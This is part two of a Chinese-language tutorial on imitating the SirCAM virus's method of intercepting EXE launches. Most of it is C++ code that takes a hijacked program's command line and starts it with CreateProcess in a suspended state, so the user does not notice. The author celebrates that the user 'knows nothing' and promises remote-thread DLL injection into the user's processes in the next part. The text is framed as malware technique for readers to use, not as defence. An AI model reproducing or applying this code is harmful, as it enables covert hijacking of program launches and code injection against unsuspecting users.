仿照SirCAM病毒控制EXE进程(2)

仿照SirCAM病毒控制EXE进程(2)

Chapter

2

利用得到的EXE启动参数创建进程

既然传进来的”%1” %*实际上是用户启动的EXE文件的路径 + 执行参数，那么我们得到后，就依样画葫芦，真的创建这个进程，让用户感觉不出来实际上是先到我们这里绕了一圈。

代码如下：

//========================== 3 ==============================

//

// 执行用户要的代码:

//

DWORD dwInProcessId = 0;

dwInProcessId = GetCurrentProcessId(); // 默认赋为自己的进程的ID值

int nLengthOfCmd = lstrlen(lpCmdLine);

if( nLengthOfCmd > 0 )

{

//======================= 3.1 =======================

//

// 来执行用户的命令行:

//

STARTUPINFO sIfo;

PROCESS_INFORMATION pInfo;

ZeroMemory( &sIfo, sizeof(sIfo) );

sIfo.cb = sizeof(sIfo);

ZeroMemory( &pInfo, sizeof(pInfo) );

// Start the child process.

HRESULT hResultEx = S_OK;

// CreateProcess之时返回一个BOOL值,如果非0,说明成功,

// 如果是0,表明失败,用GetLastError查看失败原因:

hResultEx =

CreateProcess( NULL, // No module name (use command line).

_bstr_t(lpCmdLine), // Command line.

NULL, // Process handle not inheritable.

NULL, // Thread handle not inheritable.

FALSE, // Set handle inheritance to FALSE.

CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED,

// creation flags.

NULL, // Use parent's environment block.

NULL, // Use parent's starting directory.

&sIfo, // Pointer to STARTUPINFO structure.

&pInfo ); // Pointer to PROCESS_INFORMATION structure.

// 检查CreateProcess的返回值:

if( hResultEx != 0 )// Success

{

dwInProcessId = pInfo.dwProcessId; // 既然新进程创建成功,保存它的ProcessId

}

else // Failed

{

//----------------------------------

//

// 看错误信息:

//

LPVOID lpMsgBuf;

FormatMessage(

FORMAT_MESSAGE_ALLOCATE_BUFFER |

FORMAT_MESSAGE_FROM_SYSTEM |

FORMAT_MESSAGE_IGNORE_INSERTS,

NULL,

GetLastError(), // 找到我们的错误

MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language

(LPTSTR) &lpMsgBuf,

0,

NULL

);

LogEventEx(EVENTLOG_INFORMATION_TYPE, (LPCTSTR)lpMsgBuf);

// Free the buffer.

LocalFree( lpMsgBuf );

//

//----------------------------------

}

//

//======================= 3.1 ==============================

}

else

{

// 如果本程序没有输入参数,就把InjectProcess.dll嵌入到自己进程中

// 这时dwInProcessId就是自己主进程的ID

}

怎么样，用户是不是什么也不知道，他双击运行的、从命令行运行的EXE命令都一如往昔。

但是这样就算完了吗？

既然进程尽在我们的掌握之中，那么有什么我们做不到的呢？！

接下来，我们将用远程线程插入DLL的方法来把我们的DLL注入到用户的进程的空间中，我们的DllMain将首先被执行。这个DllMain中可以写些什么呢，你发挥一下想象力吧！请看下回分解。

-----To be continued------